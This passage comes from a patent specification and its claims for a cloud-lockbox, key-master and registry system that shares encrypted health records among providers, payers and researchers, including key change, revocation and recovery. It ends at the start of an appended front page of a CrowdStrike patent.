5. HIE Registry **120** updates permissions directory **212** at Cloud Lockbox **130** This activity is depicted by reference numeral **5**.
6. Emergency room **610** using ER HCP EHR **612**, UHE API **261** and Key Master **112** can now retrieve and decrypt patient files from Cloud Lockbox **130**. Emergency room **610** also writes encounter summary and other files generated during encounter to the Cloud Lockbox **130** for later review by HCP **110**. This activity is depicted by reference numeral **6**.

If Emergency room **610** has not yet joined an applicable community of interest, then a similar mechanism would support emergency access to the records through the use of existing methods for sharing records such as the Direct Project or Blue Button.

Detecting and Preventing Waste, Fraud and Abuse

In addition to the coordination of care and HIE benefits of UHE, the mechanisms also support analytical methods to detect and prevent waste, fraud and abuse as illustrated in FIG. **8**.

1. HCP **101**, medical home of patient **116**, using HCP #1 EHR **110**, UHE API **261** and Key Master **112**, generates a summary digest of all files written to Cloud Lockbox **130** and of all other HCP reads of files for its patients. Such a summary supports coordination of care, and triggers alerts to duplicated prescriptions, and redundant tests, among other things. Further, HCP EHR #1 **110** provides data for patient review of activity on his/her health records. These activities are depicted by reference numeral **1**.
2. Payer **150** also registers with HIE Registry **120** in a process similar to registration of HCPs depicted by reference numerals **2** and **3**.
3. Payer **150**, identified by HIE Registry **120** as Payer for the Patient **116**, is able to review metadata for patients' files stored by Cloud Lockbox **130** by using UHE API **261** integrated with the Payer's Software **151** and Key Master **112**. Payer **150** is not able to decrypt the contents without further authorization and related private key exchange. Thus payer **150** can identify some utilization trends with minimized HIPAA exposure. These activities are depicted by reference numeral **4**.
4. Payer **150** and Patient's Medical Home **101** may collaborate to identify cases of waste, fraud and abuse depicted by reference numeral **5**.

5. Insurance form submittals may also be written to Cloud Lockbox **130** by HCP #1 EHR **110**, encrypted with the payer's public key, providing a simple mechanism for securely submitting and cataloging the reimbursement paperwork. The same document may also be written to the Cloud Lockbox **130** encrypted with the patient's public key. These activities are depicted by reference numeral **1**.
6. Payer **150** using Payer's Software **151**, UHE API **261** and Key Master **112** may retrieve reimbursement paperwork and write updates to such paperwork for review by Patient's Medical Home **101** as depicted by reference numeral **5**.
7. Patient **116** is able to review all access to their files via patient portal **114** depicted by reference numeral **6**.

Support for Medical Research

Using the UHE environment **100** described herein, one or more HCPs may elect to generate coordinated and longitudinal de-identified patient care research databases **118**. Permission to extract such information may be solicited at the time the patient **116** is authenticated at his/her medical home **101**. The coordinated care benefits would ripple into the research database, providing a complete picture of the individual's health history without any personal identifiers remaining. The communication mechanisms that support the generation of de-identified patient data is illustrated in FIG. **9**.

Patient's medical home **101** using the HPC #1 EHR **110**, UHE API **261** and Key Master **112** provides a full view of the medical status and activities of patient **116**.

Files may be written to a de-identified patient database **118** with a "scramble" of the patient's **116** private key to replace the public key as a patient identifier with this new number.

The relationship of the new "scrambled" identifier to the actual patient public key may be known only to the Patient's medical home **101**.

Patient's Medical Home **101** may retain the mapping so that additional data for the patient can be added over time for longitudinal studies.

Key Chance and Access Revocation

Circumstances may arise in which the need for a change of the Patient's **116** public-private key pair is required. This need could arise from circumstances such as: compromise of the privacy of the public-private key pair; detection of unauthorized access to EHR files **210** at Cloud Lockbox **130**; decisions to revoke decryption authority previously granted to one or more HCPs; or decision of Patient **116** to switch to a different HCP as its medical home. Regardless of the reason the mechanism to change or revoke access remains the same and is illustrated in FIG. **10**.

Upon receiving a request to change or revoke access, HCP #1 EHR **110** using UHE API **261** and Key Master **112** generates a new key pair and updates HIE Registry **120** with the change via a digitally signed transaction including both the old and new public keys of Patient **116** depicted by reference numeral **1**.

HIE Registry **120** updates Permissions Directory **212** with the change and with an indication that key change process is about to commence for Patient **116** via digitally signed transaction depicted by reference numeral **2**.

Permissions Directory **212** and File Handler **211**, both at Cloud Lockbox **130**, prepare a new set of Receptors for Patient's **116** files.

Patient's Medical Home **101**, using HCP #1 **110**, UHE API **261** and Key Master **112**, then transmits the digitally signed request for the current and new list of Receptors **214** for Patient **116**. HCP #1 EHR **142** identifies Patient **116** based on both the old and new public keys of Patient **116**. Cloud Lockbox **130** responds with two packages of Receptors **214** for the Patient **116**, both the old and the new, each encrypted with HCP #1's **110** public key. These activities are depicted by reference numeral **3**.

HCP #1 **110** using Key Master **112** retrieves all Encrypted EHR Files **210** for Patient **116**, decrypts the files with the Patient's **116** old private key and re-encrypts the files with the Patient's **116** new public key. HCP #1 EHR **110**, using UHE API **261** and Key Master **112**, then writes Encrypted EHR Files **210** for Patient **116** back to Cloud Storage **130** as managed by the File Handler **211**. These activities depicted by reference numeral **3**.

HCP #1 EHR **110**, using the UHE API **261** and Key Master **112**, erases the old version of the Patient's **116** Encrypted EHR Files **210**. However, the files written to Cloud Storage **130** by HCP #2 EHR **142**, now designated at **210**-A, the entity whose access is being revoked, are not erased. This measure is necessary so that HCP #2's internal operations are not compromised in terms of retaining patient files. These activities depicted by reference numeral **3**.

Cloud Lockbox **130** records the activity in the Activity Log Cloud **216** maintained at HIE Registry **120** as depicted by reference numeral **2**.

HCP #1 EHR **110**, using UHE API **261** and Key Master **112**, notifies other HCPs still authorized to write to Patient's files such as HCP #3 EHR **152** of the Patient's new public key depicted by reference numeral **4**. HCP #1 EHR **110**, using Key Master **112**, also notifies other HCPs still authorized to read and decrypt Patient's files such as HCP #3 EHR **152** of the Patient's **116** new private key depicted by reference numeral **4**.

HCP #1 EHR **110**, using UHE API **261** and Key Master **112**, also issues a file revocation request to the Key Master **112** of HCP #2 EHR **142** for all files that HCP #2 **142** has downloaded for Patient **116** other than those file written by HCP #2 EHR **142** depicted by reference numeral **5**.

If HCP #2 EHR **142** software is compliant with this feature of UHE, then it can acknowledge using Key Master **112** the destruction of Patient's **116** Encrypted EHR Files **210** that it had downloaded but not created as depicted by reference numeral **5**.

HCP #1 EHR **110**, using UHE API **261** and Key Master **112**, writes to Activity Log R&CI **216** maintained at the HIE Registry **120** the outcome of revocation requests and the notification of HCPs still authorized to write and/or read files depicted by reference numeral **1**.

It should be appreciated that, although the file revocation process has been described as occurring in combination with a key change request, a file revocation request can also occur independently of a key change process.

In one example, HCP #2 **142**, using UHE API and Key Master **112**, can continue to retrieve and decrypt the files it wrote to Patient's **116** record using the old private key now shown as HCP #2 Encrypted EHR Files **210**-A. This measure allows HCP #2 EHR **142** to continue to use the Cloud Lockbox **130** for archival purposes of its own activity. However, HCP #2 EHR **142** will no longer be able to retrieve or learn of the existence of other Encrypted EHR Files **210** for the Patient **116**. These activities depicted by reference numeral **6**.

Key Recovery and/or File Recovery

The UHE environment **100** described herein is designed to protect the privacy and confidentiality of electronic health records and other forms of sensitive information while also allowing such information to be securely shared with others. As such, there is no central key authority governing the UHE design. Each Key Master **112** operates a Key Manager and

File Broker **262** that generates public-private key pairs and retains the private keys. Thus a complete loss of the private key(s) would render the information protected inaccessible without massive computational effort to recover the private key. Only files remaining in local EHR storage would be recoverable directly from within UHE.

This aspect of potential loss of private keys of UHE is a privacy-enhancing design feature but does call out the importance of sharing the private keys with at least one other member with its Key Master **112** operating at sufficient physical distance to provide for disaster recovery scenarios. Alternatively, HCP #1 EHR **110** may install and register a second Key Master **112** that is automatically granted read and write access for any Patient **116** selecting HCP #1 as its Medical Home **101**.

In the event that a Key Master **112** becomes damaged, corrupted or otherwise loses private keys under its control, the key recovery process would in most cases resolve the loss of private keys as illustrated in FIG. **11**.

In the worst case scenario, the Patient's Medical Home **101** has suffered a corruption of the Key Master **112** such that the private key of one or more patients has been lost. Thus, the entire operation of the Key Master **112** may have failed.

First the Patient's Medical Home **101** rectifies operational problem affecting the Key Master **112** and re-establishes registration of the new software instance with the HIE Registry **120** as depicted by reference numeral **1**.

The U-API **261** initiates through the Key Master **112** the key recovery process using the public key of affected patients.

The Key Master **112** then initiates the key recovery process with the HIE Registry **120**. HIE Registry replies with a private key holder, e.g. HCP #2 EHR, for one or more patients based on the Patient Directory and Permissions **282**. These activities are depicted by reference numeral **1**.

The HIE Registry **120** sends to the Key Master **112** of HCP #2 EHR **142** a list of patients for whom HCP #1 EHR **110** needs private key recovery as depicted by reference numeral **2**. Alternatively, if Patient's Medical Home **101** had installed and registered a second Key Master **112**, the HIE Registry **120** initiates the key recovery process with this backup Key Master **112** first. The remainder of the process would remain as follows.

Key Master **112** of HCP #2 EHR **142** transmits private keys for patients in a list from HIE Registry **120** to the Key Master **112** of HCP #1 EHR **110** as depicted by reference numeral **3**. This communication would be further secured by digital signatures and optionally IP address restrictions.

Key Masters **112** HCP EHR #2 **142** records this activity in the Activity Log File Broker **264** as depicted by reference numeral **2**.

The HIE Registry **120** then sends to the Key Masters **112** HCP #3 EHR **152** a list of patients for whom the Key Masters **112** of HCP #1 EHR **110** needs private key recovery as depicted by reference numeral **4**.

Key Master **112** of HCP #3 EHR **152** transmits private keys for patients in a list from HIE Registry **120** to the Key Master **112** of HCP #1 EHR **110** as depicted by reference numeral **5**. This communication would be further secured by digital signatures and optionally IP address restrictions.

Key Masters **112** HCP EHR #3 **152** records this activity in the Activity Log File Broker **264** as depicted by reference numeral **4**.

The described process repeats until Patient's Medical Home retrieves private keys for all affected patients.

Should the key for a patient **116** be unrecoverable, the Patient's Medical Home **101** may initiate a file recovery process that seeks to restore to the UHE network whatever EHR files for the Patient **116** remain in local storage of the HCP EHR participating in the care of the given Patient **116**. The key change process from FIG. **10** and a modification of the key recovery process from FIG. **11** that focuses on files instead of keys are then invoked.

Multiple UHE APIs at a Participating HCP

A Participating HCP will in most cases operate multiple EHR software systems as well as other auxiliary systems requiring data feeds from EHR systems. These software systems are likely to include but not be limited to an inpatient EHR, I-EHR **110**-A; an ambulatory EHR, A-EHR **110**-B; and a picture archiving and communication system, PACS **110**-C as illustrated in FIG. **12**. These various systems often function independently within a health care organization, requiring internal integration to create a unified view of a given patient.

Each of the EHR software systems will need to run an interface to participate in UHE called the UHE API **261**. However only a single Key Master **112** would be required, with the API Engine **260** able to communication with multiple UHE APIs **261**.

In such a configuration, UHE can support internal HCP integration efforts by providing the common interface among all systems. For vendors of EHR systems, UHE presents a single interface to develop that would serve HCPs with any blend of EHR systems.

Multiple HIE Registries

While it would be simpler to have a single HIE registry to serve all patients, this outcome seems unlikely in our highly competitive health care and IT markets. One of ordinary skill in the art will recognize that the UHE described herein may be embodied in alternate configurations, including an environment having multiple HIE registries as illustrated by FIG. **13**.

In such an embodiment, each HCP **910**A-**910**E associates with only one HIE registry **920**A-**920**C. The HIE registries **920**A-**920**C communicate with each other during:

- Patient registration process to confirm uniqueness.
- Exchange of HCP registrations.
- Exchange of patient record permissions changes, e.g. new HCP authorized by patient.

Multiple Cloud Lockboxes

While it would be simpler to have a single provider of cloud lockboxes to serve all HCPs, one of ordinary skill in the art will recognize that such a configuration may not accommodate the highly competitive health care and IT markets. Thus, the UHE design accommodates the existence of multiple providers of cloud lockboxes as illustrated in FIGS. **14**A and **14**B.

As illustrated in FIG. **14**A, HCP **1010** is the medical home for patient A. HCP **1010** designates cloud lockbox **1030**A for patient A. The association is identified during HIE registration of the patient. Patient A authorizes HCP **1011** to read/write files. HCP **1011** writes files for patient A to cloud lockbox **1030**A to keep all patient files in one source. Similarly, write-only input for patient A, such as lab results from HCP **1048**, are also written to cloud lockbox **1030**A.

As illustrated in FIG. **14**B, HCP **1011** is the medical home for patient B. HCP **1011** designates cloud lockbox **1030**B for patient B. The association is identified during HIE registration of the patient. Patient B authorizes HCP **1010** to read/write files. HCP **1010** writes files for patient B to cloud lockbox **1030**B to keep all patient files in one source. Similarly, write-only input for patient B, such as lab results from HCP **1048**, are also written to cloud lockbox **1030**B.

Levels of Integration

It should be appreciated different levels of integration may be possible between EHRs and the UHE. For example, evolution and extension of the interfaces will progress over time.

All levels of integration may be supported by a single API Engine **260** in the Key Master **112**. An example delineation of the levels of integration is depicted in the following table.

TABLE 2

| Levels of EHR Integration with UHE | |
|---|---|
| Level 1 | Method for backing up or archiving EHR files. |
| Level 2 | Engaged in a network of providers for health information exchange. |
| Level 3 | Honor incoming revocation requests. Honor time-to-live settings in meta data. |
| Level 4 | Retain full metadata in native EHR file storage. Provide identity of individual who accesses patient files for additional detail in activity logs. |
| Level 5 | Use of UHE with local caching as primary file store. |

Data Access Options

In some situations, it may not be necessary to access complete data records but rather to only access a partial record of a patient, such as basic patient information. For example, an insurer may need to know that a certain diagnostic test was performed but the insurer does not need to have access to a full patient file. In another example, a physician specializing in one field, such as podiatrist, may not need to have access to patient information pertaining to another medical field, such as the patient's records about a patient's heart condition. Thus, in one example, a partial data record such as metadata may be provided rather than the entire patient data file.

In some situations, it may be undesirable to provide data from which specific patient identities can be determined. For example, an organization performing research may be interested in patient outcomes in relation to a specific treatment of a disease. However, the organization performing the research may not be permitted to know the identities of the patients. Thus, in one example, patient data may be anonymized in order to eliminate information such as names, addresses, and social security numbers.

Patient Dashboard

In one example, the patient portal **114** may further provide patient **116** with a patient dashboard. In particular, the patient dashboard may provide an overview of the patient's **116** medical history as well as an overview of recent activity and medical conditions. Such a patient dashboard provides a single source of information from which a patient **116** may obtain a personal medical summary as well as a comprehensive medical review.

Alternative Business Models in Health Care

Given the flexibility of the described systems, devices and methods, the UHE business model could take other forms. FIG. **15** illustrates one such alternate embodiment. FIG. **15** depicts an environment similar to that of FIG. **1** except that an entity other than a health care provider may become a patient's medical home for the purposes of medical record aggregation, called a "Medical Home" Health Record Representative ("HRR").

The HCPs are or will soon be required by Federal mandate to be able to share patient records through a set of HIE standards. Thus, the HIE goals of UHE could be met even if the HCP did not directly participate in the UHE mechanism. Such an HCP would sacrifice the cost savings inherent in the UHE design in terms of reducing storage costs unless they transferred their long-term record retention responsibilities to the HRR.

The HRR could also operate a blended architecture offering a choice between the standards-based HIE-interface solutions and the full UHE implementation.

Other Industries

The systems, devices and methods of the present application have been described primarily in relation to an example health care system. The systems, devices and method are also applicable in a wide variety of other industries in which confidential information needs to be selectively and securely shared among multiple business entities.

Legal Industry

Referring now to FIG. **16**, there is illustrated a schematic block diagram depicting a system supporting the legal industry, using a similar design as in FIG. **1** for the medical industry, but with different entities. Following the concept of the "medical home" this model addresses the creation of a "legal home" for the client. Such a "home" selection does not preclude the use of other lawyers, but the "home" lawyer does become the initial issuer and owner of the public/private key set. Similar to the health care industry, other business entities could provide the "legal home" other than law firms.

Other law firms, prosecutors and courts may be granted granular read-write access on a client-by-client basis. Write-only participants such as court reporters and labs could securely write files to the client's case file without gaining the ability to retrieve and/or decrypt any other files related to the case. The client would have a complete view of all files related to his/her case and the ability to audit access.

Real Estate Industry

Referring now to FIG. **17**, there is illustrated a schematic block diagram depicting a system supporting the real estate industry, using a similar design as in FIG. **1** for the medical industry, but with different entities. Once again following the concept of the "medical home" this model addresses the creation of a "real estate home" for the client. Such a "home" selection does not preclude the use of other realtors, but the "home" realtor does become the initial issuer and owner of the public/private key set. Similar to the health care industry, other business entities may provide the "real estate home" other than real estate firms.

Other realtors, mortgage brokers, lawyers, developers, etc. may be granted granular read-write access on a client-by-client basis. Write-only participants such as appraisers and inspectors could securely write files to the client's file without gaining the ability to retrieve and/or decrypt any other files related to the business situation. The client may have a complete view of all files related to his/her business situation and the ability to audit access.

Information Owner Controlled

The preceding depictions of the system have assumed the presence of a proxy acting on the information owners request to manage the owner's information. However, as shown in FIG. **18**, an example design also supports a stand-alone use of the mechanism operated by the owner to directly manage multiple types of information using a similar design as in FIG. **1**. In this scenario there is no "medical home" or "legal home" with default access. Instead, the information owner originates the key-pairs and all permissions. In this scenario, all activities including registration, sharing of private keys, revocation requests and key pair changes would originate with the owner using his/her own Key Master **412**.

The API Engine **460** could support APIs **461** for a variety of desktop and mobile applications running on any suitable operating system.

In one example, information owner may elect to run multiple Key Manager and File Broker modules **462** in the Key Master **412**. In this way, the Information Owner can participate in multiple community-of-interest networks operating with different encryption algorithms. In this example, the Key Master **412** contains two Key Manager and File Brokers,

**462**-A and **462**-B each operating a different encryption algorithm specific to the two specific communities-of-interest depicted. In particular, Key Manager and File Broker-A **462**-A uses an encryption algorithm shared by all members of the community-of-interest participating in the health care network represented by Cloud Lockbox Health Care **430**-A and HIE Registry **420**-A. Key Manager and File Broker-B **462**-B uses an encryption algorithm shared by all members of the community-of-interest participating in the legal network represented by Cloud Lockbox Legal **430**-B and Legal Exchange Registry **420**-B. Thus, a single Key Master **412** could support multiple Key Manager and File Broker **462** modules for participation in multiple community-of-interest networks.

Wide Applicability

With three examples of industries that can utilize the described systems, devices and methods, one can easily imagine other applications of this flexible system in any situation in which multiple members need to have access to confidential information regarding an individual, such as the insurance industry, social service agencies, commercial research and development, scientific research, and finance, for example.

From the information contained herein, those skilled in the art will perceive improvements, changes and modifications to the systems, devices and methods disclosed herein. Such improvements, changes, and modifications within the skill of the art are intended to be covered by the present application.

Notwithstanding that the numerical ranges and parameters setting forth the broad scope of the invention are approximations, the numerical values set forth in the specific examples are reported as precisely as possible. Any numerical value, however, inherently contains certain errors necessarily resulting from the standard deviation found in their respective testing measurements.

Furthermore, while the systems, devices, methods, and so on have been illustrated by describing examples, and while the examples have been described in considerable detail, it is not the intention of the applicants to restrict or in any way limit the scope of the appended claims to such detail. It is, of course, not possible to describe every conceivable combination of components or methodologies for purposes of describing the devices, systems, methods, and so on provided herein. Additional advantages and modifications will readily appear to those skilled in the art. Therefore, the invention, in its broader aspects, is not limited to the specific details and illustrative examples shown and described. Accordingly, departures may be made from such details without departing from the spirit or scope of the applicant's general inventive concept. Thus, this application is intended to embrace alterations, modifications, and variations that fall within the scope of the appended claims. The preceding description is not meant to limit the scope of the invention. Rather, the scope of the invention is to be determined by the appended claims and their equivalents.

Finally, to the extent that the term "includes" or "including" is employed in the detailed description or the claims, it is intended to be inclusive in a manner similar to the term "comprising," as that term is interpreted when employed as a transitional word in a claim. Furthermore, to the extent that the term "or" is employed in the claims (e.g., A or B) it is intended to mean "A or B or both." When the applicants intend to indicate "only A or B, but not both," then the term "only A or B but not both" will be employed. Similarly, when the applicants intend to indicate "one and only one" of A, B, or C, the applicants will employ the phrase "one and only one." Thus, use of the term "or" herein is the inclusive, and not the exclusive use. See Bryan A. Garner, A Dictionary of Modern Legal Usage 624 (2d. Ed. 1995).

What is claimed is:

**1**. A system having a plurality participant devices for conducting a secure exchange of encrypted data within a community of interest using a three-party security mechanism consisting of:

a cloud lockbox configured to:

receive and store encrypted data submitted by at least one of the plurality participant devices;

create a receptor providing transactional metadata and a file identification; and

acknowledge the receipt of the encrypted data by communicating the receptor;

a key master operated in a participant device of the plurality of participant devices of the community of interest, the key master configured to:

generate a public-private key pair for each participant device of the plurality of participant devices in the community of interest;

receive a participant device's data and related metadata;

encrypt the received data and related metadata with the participant device's public key;

create non-sensitive transactional metadata and associate the non-sensitive transactional metadata with the participant device's data and related metadata;

transmit the encrypted data, metadata, and transactional metadata to the cloud lockbox; and

maintain the participant device's private key required for decryption of the encrypted data; and

retrieve the encrypted data and encrypted metadata by submitting the receptor to the cloud lockbox;

a registry, remotely coupled to the cloud lockbox and the key master, configured to:

establish unique identities for each participant device of the community of interest with the key master, wherein the registry is configured to communicate with additional registries if more than one registry is operational for the community of interest;

establish a unique identity and authenticity of the cloud lockbox;

maintain a directory of participants and the cloud lockbox, wherein the registry is configured to function as a clearinghouse for participant devices to retrieve public keys of other participant devices; and

manage a participant-level access control list and communicate the list to the cloud lockbox for controlling access to stored data by the key master;

record an IP address for each of the key master, the cloud lockbox and the registry for selectively restricting communications;

wherein the key master and the registry are configured to update permissions for the plurality of participant devices to enable the plurality of participant devices to add or retrieve data based on the participant-level access control list; and

wherein the three-party security mechanism is configured to be integrated with via an application programming interface.

**2**. The system of claim **1**, wherein a customized community of interest is generated based on a selection of at least one of a plurality of options among built-in operating parameters, comprising:

a. selecting a public key encryption algorithm;

b. selecting a registry or a plurality of registries;

c. establishing membership requirements and identity verification thresholds;
d. selecting a cloud storage provider at which to establish the cloud lockboxes;
e. selecting from among a plurality of optional security measures;
f. determining a minimum application integration level; and
g. determining initial metadata structure, purpose, and meaning.

**3**. The system of claim **1**, wherein the three-party security mechanism is vendor-neutral, thereby enabling underlying software to security-enable any records management, file sharing, document management or similar application software.

**4**. The system of claim **1**, wherein the three-party security mechanism as a standalone service.

**5**. The system of claim **1**, wherein the plurality of participant devices are associated with participant devices of the community of interest, the participant of the community of interest comprising at least one of:
a. an individual participating directly;
b. an organization participating for its own purposes; and
c. an organization participating to represent multiple individuals, whereby the multiple individuals are participating by proxy.

**6**. The system of claim **5**, wherein the three-party security mechanism provides the multiple individuals participating by proxy the ability to access data; to review activity logs; and to receive alerts regarding anomalous access.

**7**. The system of claim **1**, wherein a key master is configured to:
a. verify identities, authenticity, and authority of the participant device in communication with the registry;
b. establish a unique identity and verify authenticity for each participant device in communications with the registry;
k. securely transmit the participant device' s private key to another participant device's key master to permit decryption of the data received from the participant device;
l. update permissions lists at the plurality of registries;
m. transmit log records of key creation, file retrieval requests, private key exchanges, and other activities to the registry.

**8**. The system of claim **1**, wherein the three-party security mechanism is configured to use unencrypted transaction metadata as indexing elements, to provide information representative of transactional information as defined by the community of interest, including information about data source and date of storage.

**9**. The system of claim **1**, wherein a registry is configured to:
g. receive activity logs from the key master, the application program interface, and the cloud lockbox to:
i. analyze activity logs to detect and halt anomalous access; and
ii. provide alerts regarding anomalous access and with routine access to activity logs; and
h. conduct polling at random intervals of the key master, the application programming interface, the cloud lockbox, and other registries to verify accessibility of activity reporting module.

**10**. The system of claim **1**, wherein a cloud lockbox comprises software operating at a cloud provider, the cloud lockbox being configured to:



a. store encrypted data, encrypted metadata, and unencrypted metadata;
b. create receptors for stored data to serve as claim tickets for the members; wherein the receptor obfuscates the physical location of the file in the cloud lockbox;
c. utilize access control lists received from the registries to determine which individuals' files a given member may store and retrieve;
d. enable push notifications to members of new receptor availability; and
e. transmit activity records of file retrieval requests to the registries.

**11**. The system of claim **1**, wherein an application programming interface is configured to:
d. convert data between a plurality of formats;
e. convert data between a key-value data store and a relational database;
f. generate metadata specific to the application, wherein the metadata is one of:
i. appended to data and encrypted with the data;
ii. encrypted separately from the data; and
iii. left unencrypted and added to the transactional metadata created by the key master by:
1. using unencrypted metadata as indexing elements, information about the source of the data; and
2. using unencrypted metadata to enable granular access control;
g. map the participant device's identification numbers in applications to community of interest identification numbers for the same participant device;
h. enable the creation of a hybrid cloud and an on-premise storage solution; and
i. transmit activity records of file retrieval requests and access revocations to the registries.

**12**. The system of claim **1**, wherein the three-party security mechanism is configured to enable:
a. changing keys;
b. revoking access;
c. recovering keys;
d. recovering files;
e. de-identifying files; and
f. providing emergency access.

**13**. The system of claim **1**, wherein the three-party security mechanism is configured to offer a plurality of security levels by:
a. deploying the key master as an appliance;
b. integrating applications with the mechanism to provide additional information, including an internal application username of a person requesting data;
c. requiring two-factor authentication for access to the key master; and
d. applying IP address communications restrictions based on information gathered by the registry.

**14**. The system of claim **1**:
a. wherein the registry is configured to communicate to the cloud lockbox permissions of the key master for the participant device to store data in the cloud lockbox for the participant device;
b. wherein the registry is configured to communicate to the cloud lockbox the public key of the participant device and the key master;
c. wherein the registry is configured to selectively communicate to the cloud lockbox the IP address of the key master;
d. wherein the key master is configured to encrypt the data and metadata with first the participant device's public key;

e. wherein the key master is configured to encrypt at least a portion of the metadata with a metadata-only participant device's public key.

**15**. The system of claim **1**, wherein the three-party security mechanism is configured to enable sharing encrypted data between participant devices:

a. wherein the registry is configured to receive data indicative of a first participant device's request to share encrypted data received from the first participant's device and stored on the cloud lockbox with a second participant device, wherein the first participant device previously verified its identity with the registry;

b. wherein the registry is configured to update permissions for the second participant device specific to the first participant device using the key master of the first participant device;

c. wherein the registry is configured to update the cloud lockbox with permissions for the second participant device for specified data received from the first participant device as authorized by the first participant device;

d. wherein the key master of the first participant device is configured to transmit a private key of the first participant device, to a key master of the second participant device, encrypted with the second participant device's public key;

e. wherein the key master of the second participant device is configured to decrypt and store the participant device's private key; and

f. wherein the key master of the second participant device is configured to retrieve and decrypt data received from the first participant device, from the cloud lockbox.

**16**. The system of claim **1**, wherein the three-party security mechanism is configured to enable reciprocal sharing of encrypted data:

a. wherein a key master of a second participant device is configured to originate data about an individual associated with a first participant device and encrypt the data and metadata with the public encryption key of the first participant, and add the encrypted data and metadata to the cloud lockbox; and

b. wherein the key master of the first participant device is configured to retrieve and decrypt the data originated by the second participant device for the individual associated with the first participant device.

**17**. The system of claim **1**, wherein a key master is configured to verify identities of other key masters, registries and cloud lockboxes during transactions using digital signatures.

**18**. The system of claim **1**, wherein the three-party security mechanism is configured to enable write-only access:

a. wherein the key master of the participant device is configured to update permissions for a write-only participant device requiring write-only access to enable the write-only participant device to add files to the cloud lockbox for a individual associated with the participant device;

b. wherein the registry is configured to update the cloud lockbox with permissions for the write-only participant device, to store data for, but not retrieve data for, the individual associated with the participant device;

c. wherein a key master of the write-only participant device is configured to encrypt data with the public key of the participant device and add the data to the cloud lockbox of the participant device;

d. wherein the key master of the participant device is configured to retrieve and decrypt the data originated by the write-only participant device for the individual associated with the participant device.

**19**. The system of claim **1**, wherein the three-party security mechanism is configured to enable metadata-only access:

a. wherein the key master of the participant device is configured to update the registry with permissions for a metadata-only participant device to retrieve metadata only for an individual associated with the participant device;

b. wherein the registry is configured to update the cloud lockbox with permissions for the metadata-only participant device to retrieve only metadata of the individual associated with the participant device.

**20**. The system of claim **1**, wherein the three-party security mechanism is configured to enable detecting and halting anomalous access:

a. wherein the registry is configured to collect activity records from the key master, the application programming interface, and the cloud lockbox for actions associated with, data, keys or metadata and generate activity logs;

b. wherein the registry is configured to analyze the activity logs to detect anomalous access to data;

c. wherein the registry is configured to communicate with the cloud lockbox to halt access to the affected data responsive to detecting anomalous access to data; and

d. wherein the registry is configured to notify the the participant device of anomalous access and halting of access.

**21**. The system of claim **1**, wherein the three-party security mechanism is configured to enable a time-to-live feature:

a. wherein the application programming interface in combination with the key master of the participating device is configured to enable the participating device to create metadata including a time-to-live value for the data in accordance with an agreement within the community of interest; and

b. wherein the key master in combination with the application programming interface is configured to enable the participating device to retrieve data with time-to-live metadata and to acknowledging one of ability and lack of ability to honor the time-to-live setting.

**22**. The system of claim **1**, wherein the three-party security mechanism is configured to enable changing a key pair:

a. wherein the key master of the participating device is configured to generate a new public-private key pair for the participant device responsive to receiving a request to change the participant device's public-private key pair;

b. wherein the key master is configured to notify the registry of the new public key for the participant device;

c. wherein the registry is configured to notify the cloud lockbox of a key change for the participant device;

d. wherein the cloud lockbox is configured to facilitate the retrieval of all of the affected data;

e. wherein the key master is configured to decrypt the data with an old private key and re-encrypt the data with the new public key;

f. wherein the key master is configured to transmit the re-encrypted files to the cloud lockbox;

g. wherein the cloud lockbox is configured to acknowledge receipt of re-encrypted files and to provide new receptors to the key master; and

h. wherein the key master of the participant device is configured to transmit the new private key to a key master of a participant device.

**23**. The system for claim **1**, wherein the three-party security mechanism is configured to enable recovery of a private key:

a. wherein the key master of a-first participant device is configured to recover the first participant device's private key from a key master of a second participating device with access to the private key, the process being mediated by the registry.

**24**. The system of claim **1**, wherein the community of interest spans a plurality of cloud providers for provisioning cloud lockboxes.

**25**. The system of claim **1**, wherein the community of interest spans multiple registries, wherein the multiple registries are configured to communicate among one-another in the community of interest to maintain unique identities.

**26**. The system of claim **1**, wherein the community of interest comprises one of:

a. a small group of individuals;

b. all individuals residing in a given country; and

c. a number of individuals connected through any type of affiliation.

**27**. The system for claim **1**, wherein the key master is configured to participate in a plurality of communities of interest, wherein each of the plurality of communities of interest:

a. requires a different encryption algorithm;

b. requires a different identity verification process; and

c. utilizes different cloud lockboxes.

**28**. The system for claim **1**, wherein the three-party security mechanism is configured to minimize exposure of data to system administrators:

a. wherein data stored in a cloud lockbox is encrypted;

b. wherein the cloud lockbox does not have the decryption key; and

c. wherein a system administrator is provided with access to encrypted data but is not provided with access to the decryption key.

**29**. The system of claim **1**, wherein the three-party security mechanism is configured to enable emergency access to the data:

a. wherein the three-party security mechanism is configured to enable access, to encrypted data received from a first participant device, by an emergency participating device in the event of an emergency in which the first participant device cannot provide authorization;

b. wherein the three-party security mechanism is configured to require an emergency participant device to at least one of have previously registered as a member of the community of interest and have a previously registered participant device act on its behalf;

c. wherein the three-party security mechanism is configured to provide the emergency participating device a private key of the participant device responsive to receiving a request for emergency access; and

d. wherein the three-party security mechanism is configured to log all activity for review.

**30**. The system of claim **1**, wherein the three-party security mechanism is configured to create a holistic view of the participant device participating in the community of interest by generating summaries, comparisons and alerts regarding the participant device, given access to data from all participants for the participant device.

**31**. The system of claim **1**, wherein the three-party security mechanism is configured to enable a hybrid cloud and on-premise storage solution with the key master offering predictive caching and the application programming interface deeply integrated into an application.

**32**. The system of **1**, wherein the three-party security mechanism is configured to enable application integration across one of a single enterprise and multiple enterprises by converting disparate data models to a common data model with sharing of data occurring across the mechanism.

* * * * *

# APPENDIX P

US011811821B2

(12) United States Patent
Krasser et al.

(10) Patent No.: US 11,811,821 B2
(45) Date of Patent: Nov. 7, 2023

(54) VALIDATION-BASED DETERMINATION OF COMPUTATIONAL MODELS

(71) Applicant: **CrowdStrike, Inc.**, Sunnyvale, CA (US)

(72) Inventors: **Sven Krasser**, Los Angeles, CA (US); **David Elkind**, Arlington, VA (US); **Brett Meyer**, Alpharetta, GA (US); **Patrick Crenshaw**, Atlanta, GA (US)

(73) Assignee: **CrowdStrike, Inc.**, Sunnyvale, CA (US)

( * ) Notice: Subject to any disclaimer, the term of this patent is extended or adjusted under 35 U.S.C. 154(b) by 245 days.

(21) Appl. No.: **17/087,194**

(22) Filed: **Nov. 2, 2020**

(65) **Prior Publication Data**

US 2021/0075798 A1 Mar. 11, 2021

**Related U.S. Application Data**

(62) Division of application No. 15/402,503, filed on Jan. 10, 2017, now Pat. No. 10,826,934.

(51) **Int. Cl.**

***H04L 9/40*** (2022.01)
***G06N 20/00*** (2019.01)
***G06F 21/56*** (2013.01)

(52) **U.S. Cl.**

